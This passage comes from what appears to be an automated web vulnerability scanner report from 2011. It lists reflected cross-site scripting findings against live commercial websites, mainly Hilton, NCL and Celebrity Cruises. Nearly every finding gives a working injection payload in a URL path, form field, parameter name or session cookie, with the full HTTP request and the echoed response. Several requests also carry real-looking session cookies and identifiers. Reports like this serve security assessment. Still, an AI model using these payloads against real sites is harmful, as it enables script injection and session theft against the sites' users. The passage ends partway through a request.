The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f60"><img%20src%3da%20onerror%3dalert(1)>97a197d7df7 was submitted in the REST URL parameter 4. This input was echoed as f0f60"><img src=a onerror=alert(1)>97a197d7df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettsf0f60"><img%20src%3da%20onerror%3dalert(1)>97a197d7df7/directions.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:07:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:18:07 GMT;path=/
Content-Length: 65501


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettsf0f60"><img src=a onerror=alert(1)>97a197d7df7/directions.do" class="languageLink">
...[SNIP]...

4.75. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e62"><img%20src%3da%20onerror%3dalert(1)>eb63c238a1e was submitted in the REST URL parameter 4. This input was echoed as e0e62"><img src=a onerror=alert(1)>eb63c238a1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettse0e62"><img%20src%3da%20onerror%3dalert(1)>eb63c238a1e/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:07:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:18:06 GMT;path=/
Content-Length: 85206


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettse0e62"><img src=a onerror=alert(1)>eb63c238a1e/index.do" class="languageLink">
...[SNIP]...

4.76. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8520e"><img%20src%3da%20onerror%3dalert(1)>e41feaea175 was submitted in the REST URL parameter 4. This input was echoed as 8520e"><img src=a onerror=alert(1)>e41feaea175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e"><img%20src%3da%20onerror%3dalert(1)>e41feaea175/localguide.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:17:56 GMT;path=/
Content-Length: 47502


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e"><img src=a onerror=alert(1)>e41feaea175/localguide.do" class="languageLink">
...[SNIP]...

4.77. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e697"><img%20src%3da%20onerror%3dalert(1)>dc3906d35ca was submitted in the REST URL parameter 4. This input was echoed as 3e697"><img src=a onerror=alert(1)>dc3906d35ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697"><img%20src%3da%20onerror%3dalert(1)>dc3906d35ca/services.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:17:47 GMT;path=/
Content-Length: 45442


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697"><img src=a onerror=alert(1)>dc3906d35ca/services.do" class="languageLink">
...[SNIP]...

4.78. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45db3"><img%20src%3da%20onerror%3dalert(1)>0f6e1a8e424 was submitted in the REST URL parameter 4. This input was echoed as 45db3"><img src=a onerror=alert(1)>0f6e1a8e424 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH45db3"><img%20src%3da%20onerror%3dalert(1)>0f6e1a8e424/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 85133
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:55:01 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:06:01 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH45db3"><img src=a onerror=alert(1)>0f6e1a8e424/index.do" class="languageLink">
...[SNIP]...

4.79. https://www2.ncl.com/vacations [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6ac7"><script>alert(1)</script>c7ba114d195 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vacationsf6ac7"><script>alert(1)</script>c7ba114d195 HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:08:38 +0000
Cache-Control: public, max-age=0
ETag: "1317647318-1"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:08:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R1788641230; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:08:40 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:08:40 GMT; path=/; domain=ncl.com
Content-Length: 37304

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
<link rel="canonical" href="/vacationsf6ac7"><script>alert(1)</script>c7ba114d195">
...[SNIP]...

4.80. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm [arrivalDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/index.htm

Issue detail

The value of the arrivalDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b177"><script>alert(1)</script>8f5e156a068 was submitted in the arrivalDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /en_US/hi/search/findhotels/index.htm HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Content-Length: 1019
Cache-Control: max-age=0
Origin: http://www3.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.974; mmid=3550783%7CBAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=3550783%7CBAAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635670296:ss=1317635584777

searchType=ALL&searchQuery=BOS+-+Logan+International+Airport%2C+MA&radiusFromLocation=40&radiusUnits=MILES&arrivalDate=1b177"><script>alert(1)</script>8f5e156a068&departureDate=04+Oct+2011&_flexibleDates=on&_rewardBooking=on&numberOfRooms=1&numberOfAdults%5B0%5D=1&numberOfChildren%5B0%5D=0&numberOfAdults%5B1%5D=1&numberOfChildren%5B1%5D=0&numberOfAdults%5B2%5D
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:56:04 GMT
Content-Length: 44738
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<input id="checkin" name="arrivalDate" class="text date" value="03 Oct 2011" type="text" value="1b177"><script>alert(1)</script>8f5e156a068" maxlength="11"/>
...[SNIP]...

4.81. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm [departureDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/index.htm

Issue detail

The value of the departureDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2388"><script>alert(1)</script>90bd9717f9c was submitted in the departureDate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /en_US/hi/search/findhotels/index.htm HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Content-Length: 1019
Cache-Control: max-age=0
Origin: http://www3.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.974; mmid=3550783%7CBAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=3550783%7CBAAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635670296:ss=1317635584777

searchType=ALL&searchQuery=BOS+-+Logan+International+Airport%2C+MA&radiusFromLocation=40&radiusUnits=MILES&arrivalDate=03+Oct+2011&departureDate=a2388"><script>alert(1)</script>90bd9717f9c&_flexibleDates=on&_rewardBooking=on&numberOfRooms=1&numberOfAdults%5B0%5D=1&numberOfChildren%5B0%5D=0&numberOfAdults%5B1%5D=1&numberOfChildren%5B1%5D=0&numberOfAdults%5B2%5D=1&numberOfChildren%5B2%5D
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44572
Date: Mon, 03 Oct 2011 12:56:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
<input id="checkout" name="departureDate" class="text date" value="04 Oct 2011" type="text" value="a2388"><script>alert(1)</script>90bd9717f9c" maxlength="11"/>
...[SNIP]...

4.82. http://www3.hilton.com/es/hi/doxch.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /es/hi/doxch.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a39f0"><script>alert(1)</script>2f0137ad299 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/hi/doxch.htm?dst=http://PFS-HI/es/hi/index.do&a39f0"><script>alert(1)</script>2f0137ad299=1 HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Apache
Content-Length: 7677
Content-Language: en
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:57 GMT
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xht
...[SNIP]...
<a href="/es/hi/transition/interim/index.htm?ori_url=%2Fes%2Fhi%2Fdoxch.htm&ori-a39f0"><script>alert(1)</script>2f0137ad299=1&ori-dst=http%3A%2F%2FPFS-HI%2Fes%2Fhi%2Findex.do&dst_url=http%3A%2F%2FATG-HI%2Fen%2Fhi%2Fpromotions%2Findex.jhtml&dst-it=Tnav%2CSP">
...[SNIP]...

4.83. http://www3.hilton.com/fr/hi/doxch.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /fr/hi/doxch.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af34"><script>alert(1)</script>0837ca8ad61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/hi/doxch.htm?dst=http://PFS-HI/fr/hi/index.do&9af34"><script>alert(1)</script>0837ca8ad61=1 HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Apache
Content-Length: 7685
Content-Language: en
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:57 GMT
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 13:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xht
...[SNIP]...
<a href="/fr/hi/transition/interim/index.htm?ori_url=%2Ffr%2Fhi%2Fdoxch.htm&ori-dst=http%3A%2F%2FPFS-HI%2Ffr%2Fhi%2Findex.do&ori-9af34"><script>alert(1)</script>0837ca8ad61=1&dst_url=http%3A%2F%2FATG-HI%2Fen%2Fhi%2Fpromotions%2Findex.jhtml&dst-it=Tnav%2CSP">
...[SNIP]...

4.84. http://www.celebritycruises.com/explore/ships/detail.do [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /explore/ships/detail.do

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload a8820<script>alert(1)</script>57aadbf14b4 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /explore/ships/detail.do?shipCode=SI&tab=sailings%2Fexplore%2Fships%2Fsailings.do%3Fpagename%3Dship_SI%26shipCode%3DSI&cS=Homepage&ICID=Cel_11Q4_web_hp_body_Silhouette_US HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027a8820<script>alert(1)</script>57aadbf14b4; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dhomepageus%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252Fexplore%2525252Fships%2525252Fdetail.do%2525253FshipCode%2525253DSI%25252526tab%2525253Dsailings%252525252Fexplore%252525252Fships%252525252%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 74972
Date: Mon, 03 Oct 2011 12:47:36 GMT
Connection: close
Set-Cookie: JSESSIONID=0000ykN6E5sA1XW-S_iYfk3OH8l:12hdbcveb; Path=/; Domain=celebritycruises.com
Set-Cookie: wuc=USA; Expires=Wed, 02 Oct 2013 12:47:35 GMT; Path=/; Domain=.celebritycruises.com


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Celebrity Silhouette | Celebrity Cruises</title>
   <meta property="og:ti
...[SNIP]...
<p style="color: #333;">
Build: cel_com_09222011_1 2011-09-20 04:30 AM
last recached on Mon Oct 03 06:27:56 EDT 2011 000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027a8820<script>alert(1)</script>57aadbf14b4
</p>
...[SNIP]...

4.85. http://www.celebritycruises.com/search/loadCruiseConfigurator.do [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /search/loadCruiseConfigurator.do

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload dfd2e<script>alert(1)</script>3152c661bf6 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search/loadCruiseConfigurator.do HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027dfd2e<script>alert(1)</script>3152c661bf6; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dhomepageus%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252Fsearch%2525252FloadCruiseConfigurator.do%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 87109
Date: Mon, 03 Oct 2011 12:47:23 GMT
Connection: close
Set-Cookie: JSESSIONID=0000kD1KrGb77Npa34CKwsDYS25:12hdbcuh7; Path=/; Domain=celebritycruises.com
Set-Cookie: wuc=USA; Expires=Wed, 02 Oct 2013 12:47:22 GMT; Path=/; Domain=.celebritycruises.com


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Plan and Book</title>
   <meta property="og:title" content="Plan and Book
...[SNIP]...
<p style="color: #333;">
Build: cel_com_09222011_1 2011-09-20 04:30 AM
last recached on Mon Oct 03 06:27:56 EDT 2011 000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027dfd2e<script>alert(1)</script>3152c661bf6
</p>
...[SNIP]...

4.86. http://www.celebritycruises.com/search/vacationSearchResults.do [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /search/vacationSearchResults.do

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload f78c3<script>alert(1)</script>fc81ed4d2f5 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded= HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/loadCruiseConfigurator.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
